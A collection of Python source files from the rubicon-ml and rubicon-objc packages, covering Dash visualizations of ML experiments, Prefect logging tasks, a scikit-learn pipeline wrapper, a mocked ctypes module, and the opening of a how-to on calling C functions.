inputClassName="column-dropdown-checkbox",
labelClassName="column-dropdown-label",
options=[{"label": column, "value": column}],
value=[column] if column not in self.hidden_columns else [],
id={
"type": "column-dropdown-checkbox",
"index": column,
},
),
id={"type": "column-dropdown-button", "index": column},
)
for column in self.all_columns
],
],
color="secondary",
id="column-selection-dropdown",
label="toggle columns",
)
publish_modal = dbc.Modal(
[
dbc.ModalHeader(
dbc.ModalTitle("publish selected experiments"),
close_button=True,
),
dbc.ModalBody(
[
dbc.Label("enter catalog YAML output path:"),
dbc.Input(
id="publish-path-input",
type="text",
value=os.path.join(os.getcwd(), "rubicon-ml-catalog.yml"),
),
],
),
dbc.ModalFooter(dbc.Button("publish", id="publish-button")),
],
id="publish-modal",
centered=True,
is_open=False,
size="lg",
)
if self.is_selectable:
header_row = [
html.Div(
header,
className="header-row",
),
dbc.Row(
[
*[dbc.Col(button, width="auto") for button in bulk_select_buttons],
dbc.Col(toggle_columns_dropdown),
],
className="button-group",
),
]
else:
header_row = [
dbc.Row(
[
dbc.Col(
html.Div(
header,
className="header-row",
),
width=8,
),
dbc.Col(toggle_columns_dropdown),
],
className="button-group",
),
]
return html.Div(
[
*header_row,
publish_modal,
dcc.Loading(experiment_table, color=light_blue),
],
)
def load_experiment_data(self):
"""Load the experiment data required for the experiments table.
Extracts all experiment metadata as well as parameters and metrics
from each experiment in `self.experiments`. Sets GitHub information
if applicable.
"""
self.experiment_records = []
self.metric_names = set()
self.parameter_names = set()
self.all_columns = ["id", "name", "created_at", "model_name", "commit_hash", "tags"]
self.hidden_columns = []
self.commit_hash = None
self.github_url = None
commit_hashes = set()
show_columns = {"id", "created_at"}
for experiment in self.experiments:
experiment_record = {
"id": experiment.id,
"name": experiment.name,
"created_at": experiment.created_at,
"model_name": experiment.model_name,
"commit_hash": None,
"tags": ", ".join(str(tag) for tag in experiment.tags),
}
if experiment.commit_hash is not None:
experiment_record["commit_hash"] = experiment.commit_hash[:7]
commit_hashes.add(experiment.commit_hash)
show_columns.add("commit_hash")
if experiment.model_name is not None:
show_columns.add("model_name")
if experiment.name is not None:
show_columns.add("name")
if len(experiment.tags) > 0:
show_columns.add("tags")
for parameter in experiment.parameters():
experiment_record[parameter.name] = str(parameter.value)
self.parameter_names.add(parameter.name)
for metric in experiment.metrics():
experiment_record[metric.name] = str(metric.value)
self.metric_names.add(metric.name)
self.experiment_records.append(experiment_record)
self.metric_names = list(self.metric_names)
self.parameter_names = list(self.parameter_names)
self.all_columns.extend(self.parameter_names + self.metric_names)
self.hidden_columns = [
column
for column in self.all_columns
if column not in list(show_columns) + self.metric_names + self.parameter_names
]
if len(commit_hashes) == 1:
github_url_root = self.experiments[0].project.github_url[:-4]
commit_hash = list(commit_hashes)[0]
self.commit_hash = commit_hash[:7]
self.github_url = f"{github_url_root}/tree/{commit_hash}"
def register_callbacks(self, link_experiment_table=False):
@self.app.callback(
Output({"type": "column-dropdown-checkbox", "index": ALL}, "value"),
[
Input("show-all-dropdown-button", "n_clicks_timestamp"),
Input("hide-all-dropdown-button", "n_clicks_timestamp"),
],
prevent_initial_call=True,
)
def update_selected_column_checkboxes(last_show_click, last_hide_click):
"""Bulk updates for the selections in the "toggle columns" dropdown.
Returns all if triggered by the "show all" button and returns
only "id" if triggered by the "hide all" button. The initial
call is prevented as the default state is neither all nor none.
"""
last_show_click = last_show_click if last_show_click else 0
last_hide_click = last_hide_click if last_hide_click else 0
if last_hide_click > last_show_click:
hidden_values = [[]] * (len(self.all_columns) - 1)
return [["id"], *hidden_values]
return [[column] for column in self.all_columns]
@self.app.callback(
Output("experiment-table", "hidden_columns"),
Input({"type": "column-dropdown-checkbox", "index": ALL}, "value"),
)
def update_hidden_experiment_table_cols(selected_columns):
"""Hide and show the columns in the experiment table.
Returns the columns that should be hidden based on whether or
not the column's corresponding value is checked in the "toggle
columns" dropdown.
"""
selected_columns = [sc[0] for sc in selected_columns if len(sc) > 0]
return [column for column in self.all_columns if column not in selected_columns]
@self.app.callback(
Output("experiment-table", "selected_rows"),
[
Input("select-all-button", "n_clicks_timestamp"),
Input("clear-all-button", "n_clicks_timestamp"),
],
State("experiment-table", "derived_virtual_indices"),
)
def update_selected_experiment_table_rows(
last_select_click, last_clear_click, experiment_table_indices
):
"""Bulk selection for the rows of the experiment table.
Returns all if triggered by the "select all" button and returns
none if triggered by the "clear all" button.
"""
if last_select_click is None and last_clear_click is None:
return list(range(len(self.experiments)))
last_select_click = last_select_click if last_select_click else 0
last_clear_click = last_clear_click if last_clear_click else 0
if last_select_click > last_clear_click:
return experiment_table_indices
return []
@self.app.callback(
Output("publish-modal", "is_open"),
[
Input("publish-selected-button", "n_clicks_timestamp"),
Input("publish-button", "n_clicks_timestamp"),
],
[
State("publish-modal", "is_open"),
State("publish-path-input", "value"),
State("experiment-table", "derived_virtual_selected_rows"),
State("experiment-table", "derived_virtual_data"),
],
)
def toggle_publish_modal(
last_publish_selected_click,
last_publish_click,
is_modal_open,
publish_path,
selected_rows,
data,
):
last_publish_selected_click = (
last_publish_selected_click if last_publish_selected_click else 0
)
last_publish_click = last_publish_click if last_publish_click else 0
if last_publish_selected_click > last_publish_click:
return True
elif last_publish_click > last_publish_selected_click:
selected_experiment_ids = [data[row].get("id") for row in selected_rows]
selected_experiments = [
e for e in self.experiments if e.id in selected_experiment_ids
]
publish(selected_experiments, publish_path)
return False
return is_modal_open | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/experiments_table.py | 0.763836 | 0.206934 | experiments_table.py | pypi |
import copy
import json
import numpy as np
import plotly.figure_factory as ff
from dash import callback_context, dcc, html
from dash.dependencies import ALL, Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common import dropdown_header
from rubicon_ml.viz.common.colors import light_blue, plot_background_blue
class MetricListsComparison(VizBase):
"""Visualize lists of metrics logged to the experiments `experiments` as
an annotated heatmap.
More info on annotated heatmaps can be found here:
https://plotly.com/python/annotated-heatmap/
Parameters
----------
column_names : list of str
Titles to use for each column in the heatmap. Defaults to None.
experiments : list of rubicon_ml.client.experiment.Experiment, optional
The experiments to visualize. Defaults to None. Can be set as
attribute after instantiation.
selected_metric : str
The name of the metric to display at launch. Defaults to None, which
selects the metric loaded first.
"""
def __init__(
self,
column_names=None,
experiments=None,
selected_metric=None,
):
super().__init__(dash_title="compare metric lists")
self.column_names = column_names
self.experiments = experiments
self.selected_metric = selected_metric
@property
def layout(self):
"""Defines the layout for the metric lists comparison."""
return html.Div(
[
dropdown_header(
list(self.metric_names),
self.selected_metric,
"comparing metric ",
f" over {len(self.experiments)} experiments",
"metric",
),
dcc.Loading(
html.Div(
dcc.Graph(
id="metric-heatmap",
),
id="metric-heatmap-container",
),
color=light_blue,
),
],
id="metric-heatmap-layout-container",
)
def load_experiment_data(self):
"""Load the experiment data required for the metric lists comparison.
Extracts all metric metadata from each experiment in `self.experiment`
if the metric's value is a list.
"""
self.experiment_records = {}
self.metric_names = set()
for experiment in self.experiments:
for metric in experiment.metrics():
if isinstance(metric.value, list):
self.metric_names.add(metric.name)
experiment_record = self.experiment_records.get(experiment.id, {})
experiment_record[metric.name] = metric.value
self.experiment_records[experiment.id] = experiment_record
if self.selected_metric is None:
self.selected_metric = metric.name
if self.selected_metric not in self.metric_names:
raise ValueError(
f"no metric named `selected_metric` '{self.selected_metric}'"
" logged to any experiment in `experiments`."
)
def register_callbacks(self, link_experiment_table=False):
outputs = [
Output("metric-heatmap", "figure"),
Output("metric-heatmap", "style"),
Output("metric-header-right-text", "children"),
Output("metric-dropdown", "label"),
]
inputs = [Input({"type": "metric-dropdown-button", "index": ALL}, "n_clicks")]
states = []
if link_experiment_table:
inputs.append(
Input("experiment-table", "derived_virtual_selected_row_ids"),
)
@self.app.callback(outputs, inputs, states)
def update_metric_heatmap(*args):
"""Render the heatmap based on the currently selected metric.
Returns the Plotly annotated heatmap generated by the values of the
experiments' selected metric, the heatmap's style, the header text
with the metric's name, and the selected metric's name.
"""
if link_experiment_table:
selected_row_ids = args[-1]
selected_row_ids = selected_row_ids if selected_row_ids else []
else:
selected_row_ids = self.experiment_records.keys()
property_id = callback_context.triggered[0].get("prop_id")
property_value = property_id[: property_id.index(".")]
if not property_value or property_value == "experiment-table":
selected_metric = self.selected_metric
else:
selected_metric = json.loads(property_value).get("index")
self.selected_metric = selected_metric
heatmap_data = []
experiment_ids = []
for experiment_id, experiment_record in self.experiment_records.items():
if experiment_id in selected_row_ids:
metric_value = experiment_record.get(selected_metric)
if metric_value is not None:
heatmap_data.append(metric_value)
experiment_ids.append(experiment_id[:7])
header_right_text = (
f"over {len(experiment_ids)} experiment"
f"{'s' if len(experiment_ids) != 1 else ''}"
)
if len(heatmap_data) == 0:
return [], {"display": "none"}, header_right_text, selected_metric
data_array = np.array(heatmap_data)
numerator = data_array - data_array.min(axis=0)
denominator = data_array.max(axis=0) - data_array.min(axis=0)
denominator[denominator == 0] = 1
scaled_heatmap_data = numerator / denominator
annotations = copy.deepcopy(heatmap_data)
for i, row in enumerate(annotations):
for j, label in enumerate(row):
if isinstance(label, float):
annotations[i][j] = round(label, 6)
heatmap_margin = 30
heatmap_min_width = 72
heatmap_cell_width = 6
heatmap_cell_height = heatmap_cell_width / 2
heatmap_cell_buffer = 12
heatmap = ff.create_annotated_heatmap(
scaled_heatmap_data,
annotation_text=annotations,
colorscale="blues",
hoverinfo="text",
text=heatmap_data,
x=self.column_names if len(self.column_names) == len(heatmap_data[0]) else None,
y=experiment_ids,
)
heatmap.update_layout(
margin_b=heatmap_margin,
margin_t=heatmap_margin,
modebar_orientation="v",
plot_bgcolor=plot_background_blue,
)
heatmap.update_xaxes(gridcolor="white")
heatmap.update_yaxes(gridcolor="white")
heatmap_height = heatmap_cell_buffer + (len(heatmap_data) * heatmap_cell_height)
heatmap_width = (
heatmap_cell_buffer + (len(heatmap_data[0]) * heatmap_cell_width)
if len(heatmap_data[0]) > 8
else heatmap_min_width
)
heatmap_style = {"height": f"{heatmap_height}rem", "width": f"{heatmap_width}rem"}
return heatmap, heatmap_style, header_right_text, selected_metric | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/viz/metric_lists_comparison.py | 0.869548 | 0.328153 | metric_lists_comparison.py | pypi |
from prefect import task
from rubicon_ml import Rubicon
@task
def get_or_create_project_task(
persistence, root_dir, project_name, auto_git_enabled=False, storage_options={}, **kwargs
):
"""Get or create a project within a `prefect` flow.
This `prefect` task can be used within a flow to
create a new project or get an existing one. It should
be the entry point to any `prefect` flow that logs
data to Rubicon.
Parameters
----------
persistence : str
The persistence type to be passed to the
`Rubicon` constructor.
root_dir : str
The root directory to be passed to the
`Rubicon` constructor.
project_name : str
The name of the project to get or create.
auto_git_enabled : bool, optional
True to use the `git` command to automatically log
relevant repository information to projects and
experiments logged with the client instance created
in this task, False otherwise. Defaults to False.
storage_options : dict, optional
Additional keyword arguments specific to the protocol being chosen. They
are passed directly to the underlying filesystem class.
kwargs : dict
Additional keyword arguments to be passed to
`Rubicon.create_project`.
Returns
-------
rubicon.client.Project
The project with name `project_name`.
"""
rubicon = Rubicon(
persistence=persistence,
root_dir=root_dir,
auto_git_enabled=auto_git_enabled,
**storage_options,
)
project = rubicon.get_or_create_project(project_name, **kwargs)
return project
@task
def create_experiment_task(project, **kwargs):
"""Create an experiment within a `prefect` flow.
This `prefect` task can be used within a flow to
create a new experiment under an existing project.
Parameters
----------
project : rubicon.client.Project
The project under which the experiment will be created.
kwargs : dict
Keyword arguments to be passed to
`Project.log_experiment`.
Returns
-------
rubicon.client.Experiment
The created experiment.
"""
return project.log_experiment(**kwargs)
@task
def log_artifact_task(parent, **kwargs):
"""Log an artifact within a `prefect` flow.
This `prefect` task can be used within a flow to
log an artifact to an existing project or experiment.
Parameters
----------
parent : rubicon.client.Project or rubicon.client.Experiment
The project or experiment to log the artifact to.
kwargs : dict
Keyword arguments to be passed to
`Project.log_artifact` or `Experiment.log_artifact`.
Returns
-------
rubicon.client.Artifact
The logged artifact.
"""
return parent.log_artifact(**kwargs)
@task
def log_dataframe_task(parent, df, **kwargs):
"""Log a dataframe within a `prefect` flow.
This `prefect` task can be used within a flow to
log a dataframe to an existing project or experiment.
Parameters
----------
parent : rubicon.client.Project or rubicon.client.Experiment
The project or experiment to log the dataframe to.
df : pandas.DataFrame or dask.dataframe.DataFrame
The `pandas` or `dask` dataframe to log.
kwargs : dict
Additional keyword arguments to be passed to
`Project.log_dataframe` or `Experiment.log_dataframe`.
Returns
-------
rubicon.client.Dataframe
The logged dataframe.
"""
return parent.log_dataframe(df, **kwargs)
@task
def log_feature_task(experiment, feature_name, **kwargs):
"""Log a feature within a `prefect` flow.
This `prefect` task can be used within a flow to
log a feature to an existing experiment.
Parameters
----------
experiment : rubicon.client.Experiment
The experiment to log a new feature to.
feature_name : str
The name of the feature to log. Passed to
`Experiment.log_feature` as `name`.
kwargs : dict
Additional keyword arguments to be passed to
`Experiment.log_feature`.
Returns
-------
rubicon.client.Feature
The logged feature.
"""
return experiment.log_feature(feature_name, **kwargs)
@task
def log_metric_task(experiment, metric_name, metric_value, **kwargs):
"""Log a metric within a `prefect` flow.
This `prefect` task can be used within a flow to
log a metric to an existing experiment.
Parameters
----------
experiment : rubicon.client.Experiment
The experiment to log a new metric to.
metric_name : str
The name of the metric to log. Passed to
`Experiment.log_metric` as `name`.
metric_value : str
The value of the metric to log. Passed to
`Experiment.log_metric` as `value`.
kwargs : dict
Additional keyword arguments to be passed to
`Experiment.log_metric`.
Returns
-------
rubicon.client.Metric
The logged metric.
"""
return experiment.log_metric(metric_name, metric_value, **kwargs)
@task
def log_parameter_task(experiment, parameter_name, parameter_value, **kwargs):
"""Log a parameter within a `prefect` flow.
This `prefect` task can be used within a flow to
log a parameter to an existing experiment.
Parameters
----------
experiment : rubicon.client.Experiment
The experiment to log a new parameter to.
parameter_name : str
The name of the parameter to log. Passed to
`Experiment.log_parameter` as `name`.
parameter_value : str
The value of the parameter to log. Passed to
`Experiment.log_parameter` as `value`.
kwargs : dict
Additional keyword arguments to be passed to
`Experiment.log_parameter`.
Returns
-------
rubicon.client.Parameter
The logged parameter.
"""
return experiment.log_parameter(parameter_name, parameter_value, **kwargs) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/workflow/prefect/tasks.py | 0.927753 | 0.555496 | tasks.py | pypi |
import warnings
from sklearn.pipeline import Pipeline, _name_estimators
from rubicon_ml.client.project import Project
from rubicon_ml.sklearn.estimator_logger import EstimatorLogger
from rubicon_ml.sklearn.utils import log_parameter_with_warning
class RubiconPipeline(Pipeline):
"""An extension of `sklearn.pipeline.Pipeline` that automatically
creates a Rubicon `experiment` under the provided `project` and logs
the pipeline's `parameters` and `metrics` to it.
A single pipeline run will result in a single `experiment` logged with
its corresponding `parameters` and `metrics` pulled from the pipeline's
estimators.
Parameters
----------
project : rubicon_ml.client.Project
The rubicon project to log to.
steps : list
List of (name, transform) tuples (implementing fit/transform) that
are chained, in the order in which they are chained, with the last
object an estimator.
user_defined_loggers : dict, optional
A dict mapping the estimator name to a corresponding user defined
logger. See the example below for more details.
experiment_kwargs : dict, optional
Additional keyword arguments to be passed to
`project.log_experiment()`.
memory : str or object with the joblib.Memory interface, default=None
Used to cache the fitted transformers of the pipeline. By default,
no caching is performed. If a string is given, it is the path to
the caching directory. Enabling caching triggers a clone of
the transformers before fitting. Therefore, the transformer
instance given to the pipeline cannot be inspected
directly. Use the attribute ``named_steps`` or ``steps`` to
inspect estimators within the pipeline. Caching the
transformers is advantageous when fitting is time consuming.
(docstring source: Scikit-Learn)
verbose : bool, default=False
If True, the time elapsed while fitting each step will be printed as
it is completed. (docstring source: Scikit-Learn)
ignore_warnings : bool, default=False
If True, ignores warnings thrown by pipeline.
Examples
--------
>>> pipeline = RubiconPipeline(
... project,
... [
... ("vect", CountVectorizer()),
... ("tfidf", TfidfTransformer()),
... ("clf", SGDClassifier()),
... ],
... user_defined_loggers = {
... "vect": FilterEstimatorLogger(
... select=["input", "decode_error", "max_df"],
... ),
... "tfidf": FilterEstimatorLogger(ignore_all=True),
... "clf": FilterEstimatorLogger(
... ignore=["alpha", "penalty"],
... ),
... }
... )
"""
def __init__(
self,
project,
steps,
user_defined_loggers={},
experiment_kwargs={"name": "RubiconPipeline experiment"},
memory=None,
verbose=False,
ignore_warnings=False,
):
self.project = project
self.user_defined_loggers = user_defined_loggers
self.experiment_kwargs = experiment_kwargs
self.experiment = None
self.ignore_warnings = ignore_warnings
super().__init__(steps, memory=memory, verbose=verbose)
def fit(self, X, y=None, tags=None, log_fit_params=True, experiment=None, **fit_params):
"""Fit the model and automatically log the `fit_params`
to rubicon-ml. Optionally, pass `tags` to update the experiment's
tags.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of the pipeline.
y : iterable, optional
Training targets. Must fulfill label requirements for all steps of the pipeline.
tags : list, optional
Additional tags to add to the experiment during the fit.
log_fit_params : bool, optional
True to log the values passed as `fit_params` to this pipeline's experiment.
Defaults to True.
fit_params : dict, optional
Additional keyword arguments to be passed to `sklearn.pipeline.Pipeline.fit()`.
experiment: rubicon_ml.experiment.client.Experiment, optional
The experiment to log the to. If no experiment is provided the metrics are
logged to a new experiment with self.experiment_kwargs.
Returns
-------
rubicon_ml.sklearn.Pipeline
This `RubiconPipeline`.
"""
with warnings.catch_warnings():
if self.ignore_warnings:
warnings.simplefilter("ignore")
pipeline = super().fit(X, y, **fit_params)
if experiment is None:
experiment = self.project.log_experiment(**self.experiment_kwargs)
self.experiment = experiment
if tags is not None:
self.experiment.add_tags(tags)
for step_name, estimator in self.steps:
logger = self.get_estimator_logger(step_name, estimator)
logger.log_parameters()
if log_fit_params:
for name, value in fit_params.items():
log_parameter_with_warning(self.experiment, name, value)
return pipeline
def score(self, X, y=None, sample_weight=None, experiment=None):
"""Score with the final estimator and automatically
log the results to rubicon-ml.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of the pipeline.
y : iterable, optional
Targets used for scoring. Must fulfill label requirements for all steps of the pipeline.
sample_weight : list, optional
If not None, this argument is passed as sample_weight keyword argument to the
score method of the final estimator.
experiment: rubicon_ml.experiment.client.Experiment, optional
The experiment to log the score to. If no experiment is provided the score is logged
to a new experiment with self.experiment_kwargs.
Returns
-------
float
Result of calling `score` on the final estimator.
"""
with warnings.catch_warnings():
if self.ignore_warnings:
warnings.simplefilter("ignore")
score = super().score(X, y, sample_weight)
if experiment is not None:
self.experiment = experiment
elif self.experiment is None:
self.experiment = self.project.log_experiment(**self.experiment_kwargs)
logger = self.get_estimator_logger()
logger.log_metric("score", score)
# clear `self.experiment` to avoid duplicate metric logging errors
self.experiment = None
return score
def score_samples(self, X, experiment=None):
"""Score samples with the final estimator and automatically
log the results to rubicon-ml.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of the pipeline.
experiment: rubicon_ml.experiment.client.Experiment, optional
The experiment to log the score to. If no experiment is provided the score is logged
to a new experiment with self.experiment_kwargs.
Returns
-------
ndarray of shape (n_samples,)
Result of calling `score_samples` on the final estimator.
"""
with warnings.catch_warnings():
if self.ignore_warnings:
warnings.simplefilter("ignore")
score_samples = super().score_samples(X)
if experiment is not None:
self.experiment = experiment
elif self.experiment is None:
self.experiment = self.project.log_experiment(**self.experiment_kwargs)
logger = self.get_estimator_logger()
try:
logger.log_metric("score_samples", score_samples)
except TypeError:
score_samples = score_samples.tolist()
logger.log_metric("score_samples", score_samples)
# clear `self.experiment` to avoid duplicate metric logging errors
self.experiment = None
return score_samples
def get_estimator_logger(self, step_name=None, estimator=None):
"""Get a logger for the estimator. By default, the logger will
have the current experiment set.
"""
logger = self.user_defined_loggers.get(step_name) or EstimatorLogger()
logger.set_experiment(self.experiment)
if step_name:
logger.set_step_name(step_name)
if estimator:
logger.set_estimator(estimator)
return logger
def __getitem__(self, ind):
"""Returns a sub-pipeline with the configured rubicon-ml loggers or
a single estimator in the pipeline.
Indexing with an integer will return an estimator; using a slice
returns another Pipeline instance which copies a slice of this
Pipeline. This copy is shallow: modifying (or fitting) estimators in
the sub-pipeline will affect the larger pipeline and vice-versa.
However, replacing a value in `step` will not affect a copy.
(docstring source: Scikit-Learn)
"""
if isinstance(ind, slice):
if ind.step not in (1, None):
raise ValueError("Pipeline slicing only supports a step of 1")
user_defined_loggers_slice = self._get_logger_slice(self.steps[ind])
return self.__class__(
self.project,
self.steps[ind],
user_defined_loggers_slice,
self.experiment_kwargs,
memory=self.memory,
verbose=self.verbose,
)
try:
_, est = self.steps[ind]
except TypeError:
# Not an int, try get step by name
return self.named_steps[ind]
return est
def _get_logger_slice(self, steps):
"""Given a slice of estimators, returns the associated slice of loggers."""
user_defined_loggers_slice = {}
for name, _ in steps:
if name in self.user_defined_loggers:
user_defined_loggers_slice[name] = self.user_defined_loggers[name]
return user_defined_loggers_slice
def make_pipeline(
project,
*steps,
experiment_kwargs={"name": "RubiconPipeline experiment"},
memory=None,
verbose=False
):
"""Wrapper around RubicionPipeline(). Does not require naming for estimators.
Their names are set to the lowercase strings of their types.
Parameters
----------
project : rubicon_ml.client.Project
The rubicon project to log to.
steps : list
List of estimator objects or (estimator, logger) tuples (implementing
fit/transform) that are chained, in the order in which they are chained,
with the last object an estimator. (docstring source: Scikit-Learn)
experiment_kwargs : dict, optional
Additional keyword arguments to be passed to
`project.log_experiment()`.
memory : str or object with the joblib.Memory interface, default=None
Used to cache the fitted transformers of the pipeline. By default,
no caching is performed. If a string is given, it is the path to
the caching directory. Enabling caching triggers a clone of
the transformers before fitting. Therefore, the transformer
instance given to the pipeline cannot be inspected
directly. Use the attribute ``named_steps`` or ``steps`` to
inspect estimators within the pipeline. Caching the
transformers is advantageous when fitting is time consuming.
(docstring source: Scikit-Learn)
verbose : bool, default=False
If True, the time elapsed while fitting each step will be printed as it
is completed. (docstring source: Scikit-Learn)
Returns
-------
rubicon_ml.sklearn.Pipeline
A `RubiconPipeline` with project `project` and steps `steps`.
"""
steps, loggers = _split_steps_loggers(steps)
steps = _name_estimators(steps)
user_defined_loggers = _name_loggers(steps, loggers)
if not isinstance(project, Project):
raise ValueError(
"project" + str(project) + " must be of type rubicon_ml.client.project.Project"
)
return RubiconPipeline(project, steps, user_defined_loggers, experiment_kwargs, memory, verbose)
def _split_steps_loggers(steps):
"""Splits the loggers and returns the estimators in the format
scikit-learn expects them.
Parameters
----------
steps: list of sklearn.Estimator or tuples of (sklearn.Estimator,
rubicon_ml.sklearn.EstimatorLogger).
The steps and estimator loggers to split.
Returns
-------
list of sklearn.Estimator and list of rubicon_ml.sklearn.EstimatorLogger
The ordered lists of estimators and rubicon-ml loggers.
"""
ret_loggers = []
ret_steps = []
for step in steps:
if isinstance(step, tuple):
ret_loggers.append(step[1])
ret_steps.append(step[0])
else:
ret_loggers.append(None)
ret_steps.append(step)
return ret_steps, ret_loggers
def _name_loggers(steps, loggers):
"""Names loggers in the format rubicon-ml expects them.
Parameters
----------
steps: list of tuples of (str, sklearn.Estimator)
The named estimator steps.
loggers: list of rubicon_ml.sklearn.EstimatorLogger
The rubicon-ml loggers.
Returns
-------
dict of str, rubicon_ml.sklearn.EstimatorLogger
The named rubicon-ml loggers.
"""
named_loggers = {}
for i in range(len(steps)):
if loggers[i] is not None:
named_loggers[str(steps[i][0])] = loggers[i]
return named_loggers | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/sklearn/pipeline.py | 0.913352 | 0.602734 | pipeline.py | pypi |
import struct
# We pretend to be a 64-bit system.
_POINTER_SIZE = 8
class ArgumentError(Exception):
pass
_array_type_cache = {}
class _CDataMeta(type):
def __mul__(self, count):
try:
return _array_type_cache[self, count]
except KeyError:
array_type = type(
f"{self.__name__}_Array_{count}",
(Array,),
{"_type_": self, "_length_": count},
)
_array_type_cache[self, count] = array_type
return array_type
class _CData(metaclass=_CDataMeta):
@classmethod
def from_address(cls, address):
return cls()
@classmethod
def in_dll(cls, dll, name):
return cls()
def _auto_unwrap(self):
return self
class _SimpleCData(_CData):
@classmethod
def _sizeof(cls):
return struct.calcsize(cls._type_)
def __new__(cls, value=None):
self = super().__new__(cls)
self.value = value if value is not None else cls._DEFAULT_VALUE
return self
def __init__(self, value=None):
pass
def _auto_unwrap(self):
if _SimpleCData in type(self).__bases__:
return self.value
else:
return self
class py_object(_SimpleCData):
_type_ = "O"
_DEFAULT_VALUE = None
@classmethod
def _sizeof(cls):
return _POINTER_SIZE
class c_short(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "h"
class c_ushort(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "H"
class c_long(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "l"
class c_ulong(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "L"
class c_int(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "i"
class c_uint(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "I"
class c_float(_SimpleCData):
_DEFAULT_VALUE = 0.0
_type_ = "f"
class c_double(_SimpleCData):
_DEFAULT_VALUE = 0.0
_type_ = "d"
class c_longdouble(_SimpleCData):
_DEFAULT_VALUE = 0.0
_type_ = "g"
c_longlong = c_long
c_ulonglong = c_ulong
class c_ubyte(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "B"
class c_byte(_SimpleCData):
_DEFAULT_VALUE = 0
_type_ = "b"
class c_char(_SimpleCData):
_DEFAULT_VALUE = b"\x00"
_type_ = "c"
class c_char_p(_SimpleCData):
_DEFAULT_VALUE = None
_type_ = "z"
@classmethod
def _sizeof(cls):
return _POINTER_SIZE
class c_void_p(_SimpleCData):
_DEFAULT_VALUE = None
_type_ = "P"
@classmethod
def _sizeof(cls):
return _POINTER_SIZE
class c_bool(_SimpleCData):
_DEFAULT_VALUE = False
_type_ = "?"
class c_wchar_p(_SimpleCData):
_DEFAULT_VALUE = None
_type_ = "Z"
@classmethod
def _sizeof(cls):
return _POINTER_SIZE
class c_wchar(_SimpleCData):
_DEFAULT_VALUE = "\x00"
_type_ = "u"
c_size_t = c_ulong
c_ssize_t = c_long
c_int8 = c_byte
c_uint8 = c_ubyte
c_int16 = c_short
c_uint16 = c_ushort
c_int32 = c_int
c_uint32 = c_uint
c_int64 = c_long
c_uint64 = c_ulong
class _Pointer(_CData):
pass
_pointer_type_cache = {None: c_void_p}
def POINTER(ctype):
try:
return _pointer_type_cache[ctype]
except KeyError:
pointer_ctype = type(f"LP_{ctype.__name__}", (_Pointer,), {"_type_": ctype})
_pointer_type_cache[ctype] = pointer_ctype
return pointer_ctype
def pointer(cvalue):
return POINTER(type(cvalue))(cvalue)
class Array(_CData):
pass
class Structure(_CData):
def __init__(self, *args):
super().__init__()
if args:
for (name, _ctype), value in zip(type(self)._fields_, args):
setattr(self, name, value)
else:
for name, ctype in type(self)._fields_:
setattr(self, name, ctype()._auto_unwrap())
class Union(_CData):
pass
class CFuncPtr(_CData):
_restype_ = None
_argtypes_ = ()
def __init__(self, src):
super().__init__()
if isinstance(src, tuple):
(name, dll) = src
self._func_name = name
self._dll_name = dll._name
else:
self._func_name = None
self._dll_name = None
self.restype = type(self)._restype_
self.argtypes = type(self)._argtypes_
def __call__(self, *args):
if self.restype is None:
return None
else:
if self._dll_name == "objc" and self._func_name in {
"objc_getClass",
"objc_getProtocol",
}:
res = self.restype(hash(args[0]))
else:
res = self.restype()
return res._auto_unwrap()
_c_functype_cache = {}
def CFUNCTYPE(restype, *argtypes):
try:
return _c_functype_cache[(restype, argtypes)]
except KeyError:
class CFunctionType(CFuncPtr):
_argtypes_ = argtypes
_restype_ = restype
_c_functype_cache[(restype, argtypes)] = CFunctionType
return CFunctionType
def PYFUNCTYPE(restype, *argtypes):
class CFunctionType(CFuncPtr):
_argtypes_ = argtypes
_restype_ = restype
return CFunctionType
def sizeof(ctype):
return ctype._sizeof()
def addressof(cvalue):
return id(cvalue)
def alignment(ctype):
return sizeof(ctype)
def byref(ctype):
return pointer(ctype)
def cast(cvalue, ctype):
if isinstance(cvalue, ctype):
return cvalue
else:
return ctype(cvalue.value)
def memmove(dst, src, count):
raise NotImplementedError(f"memmove({dst}, {src}, {count})")
def string_at(address):
return c_char_p(b"")
class CDLL:
_func_restype_ = c_int
def __init__(self, name):
super().__init__()
self._name = name
class _FuncPtr(CFuncPtr):
_restype_ = self._func_restype_
self._FuncPtr = _FuncPtr
def __getattr__(self, name):
if name.startswith("__") and name.endswith("__"):
raise AttributeError(name)
func = self.__getitem__(name)
setattr(self, name, func)
return func
def __getitem__(self, name_or_ordinal):
func = self._FuncPtr((name_or_ordinal, self))
if not isinstance(name_or_ordinal, int):
func.__name__ = name_or_ordinal
return func
class PyDLL(CDLL):
pass
pythonapi = PyDLL(None)
class LibraryLoader:
def __init__(self, dlltype):
self._dlltype = dlltype
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
dll = self._dlltype(name)
setattr(self, name, dll)
return dll
def __getitem__(self, name):
return getattr(self, name)
def LoadLibrary(self, name):
return self._dlltype(name)
cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL) | /rubicon-objc-0.4.6.tar.gz/rubicon-objc-0.4.6/docs/_mocked_modules/ctypes/__init__.py | 0.52342 | 0.182753 | __init__.py | pypi |
=====================================
Calling plain C functions from Python
=====================================
Most Objective-C APIs are exposed through Objective-C classes and methods, but some parts are implemented as plain C functions. You might also want to want to use a pure C library that provides no Objective-C interface at all. Calling C functions is quite different from calling Objective-C methods and requires some additional work, which will be explained in this how-to.
.. seealso::
The `ctypes tutorial <https://docs.python.org/3/library/ctypes.html#ctypes-tutorial>`_ in the Python documentation, which explains how to call C functions in general (without a specific focus on Apple platforms and Objective-C).
A simple example: ``puts``
--------------------------
